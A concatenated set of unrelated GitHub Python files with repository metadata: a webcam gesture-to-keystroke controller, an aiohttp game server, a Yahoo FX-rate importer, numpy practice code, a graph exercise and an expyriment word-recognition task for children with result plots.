gesture_img_dict['keystroke'][6].set(keystrokes[\"smile\"]) #smile\n gesture_img_dict['keystroke'][7].set(keystrokes[\"stop\"]) #stop\n gesture_img_dict['keystroke'][8].set(keystrokes[\"thumbs_down\"]) #thumbs_down\n gesture_img_dict['keystroke'][9].set(keystrokes[\"thumbs_up\"]) #thumbs_up\n sleep_interval.insert(0, keystrokes[\"sleep\"])\nelse:\n gesture_img_dict['keystroke'][0].set(\"volumemute\") #call_me\n gesture_img_dict['keystroke'][1].set(\"playpause\") #fist\n gesture_img_dict['keystroke'][2].set(\"pagedown\") #live_long\n gesture_img_dict['keystroke'][3].set(\"pageup\") #okay\n gesture_img_dict['keystroke'][4].set(\"right\") #peace\n gesture_img_dict['keystroke'][5].set(\"left\") #rock\n gesture_img_dict['keystroke'][6].set(\"printscreen\") #smile\n gesture_img_dict['keystroke'][7].set(\"stop\") #stop\n gesture_img_dict['keystroke'][8].set(\"volumedown\") #thumbs_down\n gesture_img_dict['keystroke'][9].set(\"volumeup\") #thumbs_up\n sleep_interval.insert(0, 3)\n\n# Save function to save all the keystroke set\ndef savefile(): \n path = os.getcwd()+'\\saved_keystrokes.txt'\n if path != '':\n with open(path, 'w') as f:\n content = f'{{\"call_me\":\"{gesture_img_dict[\"keystroke\"][0].get()}\",\"fist\":\"{gesture_img_dict[\"keystroke\"][1].get()}\",\"live_long\":\"{gesture_img_dict[\"keystroke\"][2].get()}\",\"okay\":\"{gesture_img_dict[\"keystroke\"][3].get()}\",\"peace\":\"{gesture_img_dict[\"keystroke\"][4].get()}\",\"rock\":\"{gesture_img_dict[\"keystroke\"][5].get()}\",\"smile\":\"{gesture_img_dict[\"keystroke\"][6].get()}\",\"stop\":\"{gesture_img_dict[\"keystroke\"][7].get()}\",\"thumbs_down\":\"{gesture_img_dict[\"keystroke\"][8].get()}\",\"thumbs_up\":\"{gesture_img_dict[\"keystroke\"][9].get()}\",\"sleep\":{sleep_interval.get()}}}'\n f.write(content)\n label_saved = Label(frame_setting, text = \"Keystrokes Saved\", fg='grey')\n label_saved.grid(row = 9, column=0, columnspan=26, pady = 5)\n\nbutton_save = Button(frame_setting, text = \"Save Keystroke\", padx=10, pady = 5, command = savefile, width = 10, fg='dark blue')\nbutton_save.grid(row=8, column = 8, columnspan=3)\n\n\n###################\n## Webcam Output ##\n###################\n\n# Set new frame for webcam output\nframe_webcam = LabelFrame(root, text = \"Output\", width = 780, pady=5)\nframe_webcam.grid(row=1, column=0)\n\n# We divide the frame into a 26 column grid\nfor i in range(26):\n frame_webcam.columnconfigure(i,{'minsize':30})\n # Label(frame_webcam, text = 'test').grid(row=0, column=i)\n\n# Create new label to hold webcam\nlabel_webcam = Label(frame_webcam)\nlabel_webcam.grid(row=1, column=1, columnspan=14)\n\n# # Create new text to hold prediction output\npred_text = Text(frame_webcam, width=30, height=19, wrap = WORD)\npred_text.grid(row=1, column = 16, columnspan=9)\n\n\n# initialize mediapipe\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\nhands = mp_hands.Hands(max_num_hands=1, min_detection_confidence=0.7)\n\n# Load the gesture recognizer model\nmodel = load_model('hand-gesture-recognition-code/mp_hand_gesture')\n\n# Load class names\nf = open('hand-gesture-recognition-code/gesture.names', 'r')\nclassNames = f.read().split('\\n')\nf.close()\n\n\n# Initialize the webcam\ncap = cv2.VideoCapture(0)\n\n# Initialise variable to determine whether to run check_class function\nrecheck = True\n\n# Function to run if gesture detected\ndef check_class(className):\n # call upon global recheck variable\n global recheck, pred_text, keystrokes\n # Get current time\n time_now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n # Get saved keystrokes from txt file in current directory\n if os.path.exists('saved_keystrokes.txt'):\n with open('.\\saved_keystrokes.txt', 'r') as f:\n keystrokes = json.loads(f.readline())\n else:\n keystrokes = {\"call_me\":\"volumemute\",\"fist\":\"playpause\",\"live_long\":\"pagedown\",\"okay\":\"pageup\",\"peace\":\"right\",\"rock\":\"left\",\"smile\":\"printscreen\",\"stop\":\"stop\",\"thumbs_down\":\"volumedown\",\"thumbs_up\":\"volumeup\",\"sleep\":3}\n \n if className == 'call me' and recheck == True:\n pyautogui.press([keystrokes['call_me']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['call_me']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'fist' and recheck == True:\n pyautogui.press([keystrokes['fist']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['fist']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'live long' and recheck == True:\n pyautogui.press([keystrokes['live_long']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['live_long']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'okay' and recheck == True:\n pyautogui.press([keystrokes['okay']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['okay']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'peace' and recheck == True:\n pyautogui.press([keystrokes['peace']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['peace']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'rock' and recheck == True:\n pyautogui.press([keystrokes['rock']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['rock']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'smile' and recheck == True:\n pyautogui.press([keystrokes['smile']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['smile']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'stop' and recheck == True:\n pyautogui.press([keystrokes['stop']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['stop']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'thumbs down' and recheck == True:\n pyautogui.press([keystrokes['thumbs_down']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['thumbs_down']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n elif className == 'thumbs up' and recheck == True:\n pyautogui.press([keystrokes['thumbs_up']])\n recheck = False\n pred_text.insert(1.0, f\"{time_now}: Pressed {keystrokes['thumbs_up']}\\n\")\n sleep(keystrokes['sleep'])\n recheck = True\n \n\ndef run():\n # disable the save and run button once webcam has run\n if button_run[\"state\"] == \"normal\":\n button_run[\"state\"] = \"disabled\"\n button_save[\"state\"] = \"disabled\"\n\n def show_frames():\n # Read each frame from the webcam\n _, frame = cap.read()\n\n x, y, c = frame.shape\n\n # Flip the frame vertically\n frame = cv2.flip(frame, 1)\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n # Get hand landmark prediction\n result = hands.process(framergb)\n \n className = ''\n\n # post process the result\n if result.multi_hand_landmarks:\n landmarks = []\n for handslms in result.multi_hand_landmarks:\n for lm in handslms.landmark:\n # print(id, lm)\n lmx = int(lm.x * x)\n lmy = int(lm.y * y)\n\n landmarks.append([lmx, lmy])\n\n # Drawing landmarks on frames\n mp_drawing.draw_landmarks(\n frame,\n handslms,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n\n # Predict gesture\n prediction = model.predict([landmarks])\n # print(prediction)\n classID = np.argmax(prediction)\n className = classNames[classID]\n\n # show the prediction on the frame\n cv2.putText(frame, className, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA)\n\n if recheck:\n # run threading so that check_class can be run asynchronously in the background\n t = threading.Thread(target=check_class, args=(className,))\n t.start() # start child thread\n\n\n # Show the final output\n # https://stackoverflow.com/questions/62293077/why-is-pils-image-fromarray-distorting-my-image-color\n new_frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # resize to desired size\n new_frame_rgb = cv2.resize(new_frame_rgb, (400, 300))\n imgtk = ImageTk.PhotoImage(image = Image.fromarray(new_frame_rgb))\n label_webcam.imgtk = imgtk\n label_webcam.configure(image=imgtk)\n # Repeat after an interval to capture continiously\n label_webcam.after(20, show_frames)\n show_frames()\n\n\n# A save button in the setting frame to run the webcam and prediction only upon clicked\nbutton_run = Button(frame_setting, text = \"Run\", padx=10, pady = 5, command = run, width = 10, fg='dark green')\nbutton_run.grid(row=8, column = 16, columnspan=3)\n\n# loop through root and check changes\nroot.mainloop()","repo_name":"erjieyong/Gesture_Control","sub_path":"Gesture_Control.py","file_name":"Gesture_Control.py","file_ext":"py","file_size_in_byte":14851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29899402090","text":"class MetricStatus:\n ACTIVE = 1\n PAUSED = 2\n\n _ALL = [ACTIVE, PAUSED]\n\n @classmethod\n def toggle_status(cls, current_status: int) -> int:\n if current_status == cls.ACTIVE:\n return cls.PAUSED\n\n return cls.ACTIVE\n\n\nclass MetricDataType:\n INT = 1\n FLOAT = 2\n STRING = 3\n INCREMENT = 4\n\n _CERBERUS_ALLOWED = set([INT, FLOAT, STRING, INCREMENT])\n\n __DB_TYPES_MAP = {\n # Postgres data types mapping\n INT: 'BIGINT',\n FLOAT: 'DOUBLE PRECISION',\n STRING: 'TEXT',\n INCREMENT: 'BIGINT'\n }\n\n __CERBERUS_TYPES_MAP = {\n # ('CERBERUS_TYPE_NAME', PYTHON_FUNC_FOR_COERCE)\n INT: ('integer', int),\n FLOAT: ('float', float),\n STRING: ('string', str),\n INCREMENT: ('integer', int)\n }\n\n _CERBERUS_TYPES = list({v[0] for v in __CERBERUS_TYPES_MAP.values()})\n\n @classmethod\n def get_db_type(cls, _type):\n return cls.__DB_TYPES_MAP.get(_type)\n\n @classmethod\n def get_cerberus_type(cls, _type):\n return cls.__CERBERUS_TYPES_MAP.get(_type)\n","repo_name":"realwhite/push_store","sub_path":"server/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35439664059","text":"from http.client import http\n\n#? GET 메소드 요청예제\n\n#* 1. 연결 객체 생성\nconn = http.client.HTTPConnection(\"www.python.org\") \n\n#* 2. 요청 보내기\nconn.request(\"GET\", \"/index.html\")\n\n#* 3. 응답 객체 생성\nresponse = conn.getresponse()\n\n#* 4. 응답 데이터를 읽음\ndate = response.read()\n\n#* 5. 연결을 닫음\nconn.close()","repo_name":"dltpals222/python-prac","sub_path":"httpClientModule.py","file_name":"httpClientModule.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41977792606","text":"import numpy as np\na = np.array([1,2,3,4,5])\nprint(type(a))\n\nb = np.array([[1,2,3,4,5], [11,12,13,14,15,]])\nprint(b)\n\nc = np.array([1,2,3,4,5,6,7,8], ndmin= 2)\nprint(c)\n\nprint(b.shape)\n\nb.shape = (5,2)\nprint(b)\n\nprint(b.ndim, b.shape)\n\na = np.arange(24)\nprint(a.ndim, a.shape)\nb = a.reshape(2,4,3)\nprint(b)\n\na = np.empty(shape=(3,4), dtype=int)\nprint(a)\n\n# convert sequences to array\nl = [1,2,3,4,5,6,7,8]\nt = (1,2,3,4,5,6,7,8)\np = {1,2,3,4,5,6,7,8}\nn = np.asarray(l)\nn1 = np.asarray(t)\nn2 = np.asarray(p)\nprint(type(n), type(n1), type(n2))\n\nl = range(50)\nfor i in l:\n print(i)\nprint(l, type(l))\n\nl = range(5)\nit = iter(l)\nprint(type(it), type(l))\nna = np.fromiter(l, dtype=int)\nna2 = np.asarray(l)\nprint(na, na2)\nna = np.arange(10, 20, 2)\nprint(na)\nn = np.array(range(10))\ns = slice(4,8,2)\nprint(n[4:8:2], n[s])\nn = np.arange(10)\nprint(n, type(n))\n\n\n# boolean of nd array\nn = np.arange(10)\nn = n[n>5]\nprint(n)\n\n# iterating arrays\nn = np.arange(0,100, 10)\nn = np.reshape(n, (5,2))\nprint(n)\nfor i in np.nditer(n):\n print(i)\nfor i in n:\n print(i)\n\nn = n.reshape(2,5)\nprint(n)\nfor i in np.nditer(n, op_flags = ['readwrite']):\n i[...] = i*2\n\nprint(n)\n\nn1 = np.arange(0, 20, 2).reshape(5,2)\nn2 = np.arange(20, 40, 2).reshape(5,2)\nprint(n1)\nprint(n2)\nfor i, j in np.nditer([n1, n2]):\n print(\"{}:{}\".format(i, j))\n r = i*j\n print(\"result: \", r)\n\nf = n1.flatten()\nprint(f)\n\n# arithmetic operations\nn = np.arange(9, dtype=float).reshape(3,3)\na = [10, 20, 30]\nr = np.multiply(n, a)\nprint(r)\n\n# mean\n\nn = np.arange(9).reshape(3,3)\nm = np.mean(n, axis=0)\nm = np.mean(n, axis=1)\nprint(n, m)\n\nn = np.array([[1, 4], [8, 6]])\nn = np.sort(n, axis=0)\nprint(n)\n\ndt = np.dtype([('name', 'S10'), ('age', int)])\na = np.array([('rava', 21), ('aziz', 89), ('islom', 99)], dtype = dt)\na = np.sort(a, order = 'name')\nprint(a)\n\na = np.array([[20, 45, 33], [66, 54, 10], [46, 32, 88]])\nam = np.argmax(a, axis=0)\nprint(am)\n\nn = np.arange(9).reshape(3,3)\nprint(n)\nm = np.where(n>3)\nprint(\"My array: \",n[m])\n\n\n# numpy matplotlib\nfrom matplotlib import pyplot as plt\nn = np.arange(1,11)\ny = 2*n+5\nprint(y)\nplt.title(\"Matplotlib demo\")\nplt.xlabel(n)\nplt.ylabel(y)\n#plt.plot()\n#plt.show()\n\n# making two plot\nx = np.arange(0, 3 * np.pi, 0.1)\ny1 = np.sin(x)\ny2 = np.cos(x)\n\nplt.subplot(2,1,1)\nplt.plot(x, y1)\nplt.title(\"Sinus\")\n\nplt.subplot(2,1,2)\nplt.plot(x, y2)\nplt.title(\"Cosine\")\n\n#plt.show()\na = np.arange(1,49).reshape(6,8)\nprint(a)\n\nnp.save('rauf_file', a)\n\n# load file from out disk\nb = np.load('rauf_file.npy')\nd = b*3\nprint(d)\n\na = np.arange(1,82).reshape(9,9)\nprint(a)\nnp.savetxt('rauf_file_txt', a)\nb = np.loadtxt('rauf_file_txt')\nprint(b*np.pi)\n\n","repo_name":"iamraufodilov/P","sub_path":"Numpy/numpy_essentials.py","file_name":"numpy_essentials.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35968878583","text":"#!/usr/bin/env python\n\n'''\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, version 3.\n This program is distributed in the hope that it will be useful, but\n WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n General Public License for more details.\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n'''\n\nfrom aiohttp import web\nfrom aiohttp_sse import sse_response\nimport asyncio\nimport json\nimport aiohttp_jinja2\nimport jinja2\nimport os\n\ngames = {\n 'b3' : {\n 'devices' : {\n 1234 : {\n 'name' : 'Arthur'\n },\n 5678 : {\n 'name' : 'Alicia'\n }\n },\n 'devices_changed' : asyncio.Condition()\n }\n}\n\nroutes = web.RouteTableDef()\nROOT = os.path.dirname(__file__)\n\n@routes.get('/{game_name}/devices')\nasync def devices(request):\n game_name = request.match_info['game_name']\n game = games[game_name]\n devices_changed = game['devices_changed']\n async with sse_response(request) as resp:\n while True:\n devices = game['devices'] \n await resp.send(json.dumps(devices))\n async with devices_changed:\n await devices_changed.wait() \n return resp\n\n@routes.get('/')\nasync def index(request):\n content = open(os.path.join(ROOT, 'html/index.html'), 'r').read()\n return web.Response(content_type='text/html', text=content)\n\n@routes.get('/{style_name}.css')\nasync def style(request):\n style_name = request.match_info['style_name']\n content = open(os.path.join(ROOT, f'html/{style_name}.css'), 'r').read()\n return web.Response(content_type='text/css', text=content)\n\n@routes.get('/scripts/{script_name}.js')\nasync def script(request):\n script_name = request.match_info['script_name']\n content = open(os.path.join(ROOT, f'html/scripts/{script_name}.js'), 'r').read()\n return web.Response(content_type='application/javascript', text=content)\n\n@routes.get('/scripts/lib/{lib_name}.js')\nasync def lib(request):\n lib_name = request.match_info['lib_name']\n content = open(os.path.join(ROOT, f'html/scripts/lib/{lib_name}.js'), 'r').read()\n return web.Response(content_type='application/javascript', text=content)\n\napp = web.Application()\napp.add_routes(routes)\nweb.run_app(app)\n\n","repo_name":"VianneyRousset/EscapeRoom-Server","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40024457018","text":"import logging\nimport pathlib\nimport re\nimport sys\nfrom datetime import datetime\nfrom pprint import pprint\n\nimport lxml.html\nimport pymongo\nimport requests\nfrom dateutil.relativedelta import relativedelta\nfrom docopt import docopt\n\nimport coinapi\nfrom coinapi.clientbase import ClientBase\nfrom coindb.bulkop import BulkOp\n\nUTC = ClientBase.UTC\nJST = ClientBase.JST\nutc_now = ClientBase.utc_now\nparse_time = ClientBase.parse_time\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n args = docopt(\"\"\"\n Usage:\n {f} [options] EXCHANGE INSTRUMENT [PARAM...]\n \n Options:\n --db DB\n --start START [default: {start}]\n --stop STOP [default: {now}]\n\n \"\"\".format(f=pathlib.Path(sys.argv[0]).name,\n start=JST.localize(datetime(2016, 12, 29)),\n now=utc_now().astimezone(JST)))\n pprint(args)\n db_client = pymongo.MongoClient()\n db = args['--db']\n start = parse_time(args['--start'])\n stop = parse_time(args['--stop'])\n\n exchange = args['EXCHANGE']\n instrument = args['INSTRUMENT']\n if exchange == 'yahoo':\n client = 'yahoo'\n else:\n client = getattr(coinapi, exchange).Client() # type: ClientBase\n db = db or exchange\n db = db_client[db]\n collection = db[instrument]\n params = dict(map(lambda s: s.split('='), args['PARAM']))\n with BulkOp(collection) as bulk_op:\n collection.create_index([\n ('time', 1), ('id', 1)\n ], unique=True)\n\n if client == 'yahoo':\n gen = import_yahoo(instrument, start, stop)\n else:\n try:\n gen = client.public_executions_asc(instrument, start, stop, **params)\n except StopIteration:\n gen = client.public_executions_desc(instrument, start, stop, **params)\n\n for data in gen:\n bulk_op.insert(data)\n\n\ndef import_yahoo(instrument: str, start: datetime, stop: datetime):\n \"\"\"\n https://info.finance.yahoo.co.jp/history/?code=USDJPY%3DX&sy=2017&sm=11&sd=18&ey=2018&em=2&ed=16&tm=d&p=1\n https://info.finance.yahoo.co.jp/history/?code=USDJPY%3DX&sy=2017&sm=11&sd=18&ey=2018&em=2&ed=16&tm=d&p=3\n \"\"\"\n start = start.astimezone(JST)\n end = stop.astimezone(JST) - relativedelta(days=1)\n symbol = instrument.replace('/', '')\n assert len(symbol) == 6, instrument\n url_format = 'https://info.finance.yahoo.co.jp/history/?code={symbol}%3DX&sy={sy}&sm={sm}&sd={sd}&ey={ey}&em={em}&ed={ed}&tm=d&p={p}'\n with requests.Session() as s:\n params = dict(symbol=symbol,\n sy=start.year, sm=start.month, sd=start.day,\n ey=end.year, em=end.month, ed=end.day,\n p=1)\n while True:\n res = s.get(url_format.format(**params))\n m = re.search('\\d+~(\\d+)件/(\\d+)件中', res.text, re.MULTILINE)\n if not m:\n raise Exception('#no match')\n\n root = lxml.html.fromstring(res.text)\n td_list = []\n for tr in root.cssselect('tr'):\n for td in tr.cssselect('td'):\n td_list.append(td.text_content())\n text = ' '.join(td_list)\n text = re.sub('\\s+', ' ', text)\n for m in re.finditer(\n '(?P\\d+)年(?P\\d+)月(?P\\d+)日 (?P[.\\d]+) (?P[.\\d]+) (?P[.\\d]+) (?P[.\\d]+)',\n text, re.MULTILINE):\n \"\"\"\n yield dict(time=t,\n id='#{}'.format(i),\n price=float(data['price']),\n qty=float(data['amount']),\n data=data)\n \"\"\"\n d = m.groupdict()\n print(d)\n yield dict(time=JST.localize(datetime(int(d['y']), int(d['m']), int(d['d']))),\n id='{:04d}{:02d}{:02d}'.format(int(d['y']), int(d['m']), int(d['d'])),\n o=float(d['o']), h=float(d['h']), l=float(d['l']), c=float(d['c']))\n\n if m.group(1) == m.group(2):\n print('#end')\n return\n\n params['p'] += 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tetocode/cointax","sub_path":"import_rate.py","file_name":"import_rate.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36900280254","text":"from Ex5.SystemsDecisionMaker import systems_decision_maker\nfrom Ex5.GraphGenerator import graphs_generator\n\n\"\"\"A collection of 100 graphs\"\"\"\ngraphs = graphs_generator(False)\n\"\"\"The updated 100 graps\"\"\"\nupdate_graph = {}\ni = 0\n\"\"\"A variable used to calculate the average number of pc with the system\"\"\"\nsum = 0\n\"\"\"A variable used to count the number of error. It must be 0 at the end\"\"\"\nerror = 0\nfor graph in graphs.values():\n update_graph[i] = systems_decision_maker(graph)\n \"\"\"Count the number of pc with the system\"\"\"\n j = 0\n for v in update_graph[i].vertices():\n if v.system():\n j += 1\n \"\"\"Check if there is an error. An error occurs when both the system and full_coverage are false or true\n in a vertex. In the first case because that vertex should have the system, \n in the second because it should not have it\"\"\"\n if (not v.full_coverage() and not v.system()) or (v.full_coverage() and v.system()):\n print(\"ERRORE\")\n error += 1\n i += 1\n sum += j\n print(\"In the \", i, \"-th graph there are \", j, \" user with the system on their pc\")\naverage = sum/100\nprint(\"The average pc with the system are \", average)\nprint(\"error \", error)","repo_name":"Army96/AADS","sub_path":"Ex5/FakeNewsDetector.py","file_name":"FakeNewsDetector.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70083582508","text":"while True:\n n = int(input())\n\n if n == 0:\n break\n\n a = list(map(int, input().split()))\n\n a.sort()\n\n res = 1000000\n\n prev = 1000000\n for item in a:\n res = min(res, abs(prev - item))\n prev = item\n\n print(res)\n","repo_name":"jeongth9446/problem-solving","sub_path":"acmicpc/python/13280.py","file_name":"13280.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28633684458","text":"# This program runs only with the two folders 'sounds' and 'pictures' containing the audio and visual stimuli for the experiment\nimport os\nimport expyriment\nfrom random import randint\nimport matplotlib.pyplot as plt\n\n\"\"\" data analysis part, create histogram for the participant accuracy and its mean reaction time for each of the eight items \"\"\"\n\n#accuracy function \ndef Trueinstances(tab):\n res = 0\n for case in tab:\n if case[1] == \"True\":\n res += 1\n return res\n\n#Generate accuracy histogram\ndef AccuracyPlot(tab):\n plt.bar([0, 1], [Trueinstances(tab), len(tab) - Trueinstances(tab)], tick_label=[\"True\", \"False\"])\n plt.show()\n\n#compute the mean rt for two trials of a target word\ndef moyenne(tab, string):\n a = 0\n b = 0\n long = 1\n \n for case in tab:\n if case[0] == string and a == 0:\n a = case[2]\n elif case[0] == string and a != 0:\n b = case[2]\n long = 2\n \n return (a+b)/long\n\n# mean reaction time for each target-words + histogram\ndef RTplot(tab):\n couche = moyenne(tab, 'ELLE_OÙ_COUCHE.wav')\n main = moyenne(tab, 'ELLE_OÙ_MAIN.wav')\n voiture = moyenne(tab, 'ELLE_OÙ_VOITURE.wav')\n ballon = moyenne(tab, 'IL_OÙ_BALLON.wav')\n biberon = moyenne(tab, 'IL_OÙ_BIBERON.wav')\n livre = moyenne(tab, 'IL_OÙ_LIVRE.wav')\n nez = moyenne(tab, 'IL_OÙ_NEZ.wav')\n pied = moyenne(tab, 'IL_OÙ_PIED.wav')\n \n plt.bar([0, 1, 2, 3, 4, 5, 6, 7], [couche, main, voiture, ballon, biberon, livre, nez, pied], tick_label=[\"Couche\", \"Main\", \"Voiture\", \"Ballon\", \"Biberon\", \"Livre\", \"Nez\", \"Pied\"])\n plt.show()\n\n\n\n\"\"\" End of data analysis \"\"\"\n \n \n# Matrix (16x4) of each trial in the task. It contains stimuli (sounds and pictures) and the target picture (1 or 2)\ntableau = [[os.path.join(\"sounds\", \"ELLE_OÙ_COUCHE.wav\"), os.path.join(\"pictures\",\"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_COUCHE.wav\"), os.path.join(\"pictures\", \"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_VOITURE.wav\"), os.path.join(\"pictures\",\"voiture.jpg\"), os.path.join(\"pictures\",\"balle.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_VOITURE.wav\"), os.path.join(\"pictures\",\"voiture.jpg\"), os.path.join(\"pictures\",\"balle.jpg\"), 1], \n[os.path.join(\"sounds\", \"IL_OÙ_BIBERON.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 1], \n[os.path.join(\"sounds\",\"IL_OÙ_BIBERON.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 1], \n[os.path.join(\"sounds\",\"IL_OÙ_NEZ.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 1], \n[os.path.join(\"sounds\", \"IL_OÙ_NEZ.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 1], \n[os.path.join(\"sounds\", \"ELLE_OÙ_MAIN.wav\"), os.path.join(\"pictures\", \"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 2], \n[os.path.join(\"sounds\", \"ELLE_OÙ_MAIN.wav\"), os.path.join(\"pictures\", \"couche.jpg\"), os.path.join(\"pictures\", \"main.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_BALLON.wav\"), os.path.join(\"pictures\", \"voiture.jpg\"), os.path.join(\"pictures\", \"balle.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_BALLON.wav\"), os.path.join(\"pictures\", \"voiture.jpg\"), os.path.join(\"pictures\", \"balle.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_LIVRE.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_LIVRE.wav\"), os.path.join(\"pictures\", \"biberon.jpg\"), os.path.join(\"pictures\", \"livre.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_PIED.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 2], \n[os.path.join(\"sounds\", \"IL_OÙ_PIED.wav\"), os.path.join(\"pictures\", \"nez.jpg\"), os.path.join(\"pictures\", \"pied.jpg\"), 2]]\n\nexp = expyriment.design.Experiment(name=\"looking-while-listening task\") # create an Experiment object\n#expyriment.control.set_develop_mode(on=True) ## Set develop mode. Comment for real experiment\n \nexpyriment.control.initialize(exp)\n \n#set mouse cursor and screen size\nmouse = expyriment.io.Mouse(show_cursor=True)\n\n \n#create a fixation cross\nfixcross = expyriment.stimuli.FixCross(size=(25, 25),\n line_width=3,\n colour=expyriment.misc.constants.C_WHITE)\n \nexp.add_data_variable_names(['sound', 'picture1', 'picture2', 'accuracy', 'rt']) #label different types of data collected\n \nexpyriment.control.start() #starts the experiment, ask for an id number\nfixcross.present() # clear screen, presenting fixation cross\n \n#Matrix for data, will append target stimuli, accuracy and rt for each trial\ntrueOrFalse = \"\"\ntabData = [[\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0], [\"\", \"\", 0]]\n\n#Experimental task\nappeared = [] #create an empty list, will append each trial completed\ni = 0\nwhile i < 16: #loop until it reaches 16 trials\n ok = False\n while ok == False:\n nbr_aleatoire = randint(0, 15) #randomize the order of the trials\n for _, value in enumerate(appeared):\n if nbr_aleatoire == value :\n break\n else : \n ok = True\n \n appeared.append(nbr_aleatoire)\n sound = expyriment.stimuli.Audio(tableau[nbr_aleatoire][0]) #define audio stimuli\n image1 = expyriment.stimuli.Picture(tableau[nbr_aleatoire][1], position = (-200, 0)) #define visual stimuli\n image2 = expyriment.stimuli.Picture(tableau[nbr_aleatoire][2], position = (200, 0))\n BB = expyriment.io.TouchScreenButtonBox([image1, image2]) #create a button box for the two visual stimuli\n BB.create()\n BB.show()\n \n sound.present()\n \n response, rt = BB.wait(duration = 8000) \n \n #Gets only the name of the stimuli (remove \"sounds\" or \"pictures\" from their pathname)\n shortSound = tableau[nbr_aleatoire][0][7:] \n shortImage1 = tableau[nbr_aleatoire][1][9:]\n shortImage2 = tableau[nbr_aleatoire][2][9:]\n \n #check participants' accuracy \n if response == image1 and tableau[nbr_aleatoire][3] == 1:\n print(\"1\")\n trueOrFalse = \"True\"\n elif response == image2 and tableau[nbr_aleatoire][3] == 2:\n print(\"2\")\n trueOrFalse = \"True\"\n else :\n trueOrFalse = \"False\"\n print(trueOrFalse)\n \n #add data under the label defined earlier\n exp.data.add([shortSound,\n shortImage1,\n shortImage2,\n trueOrFalse,\n 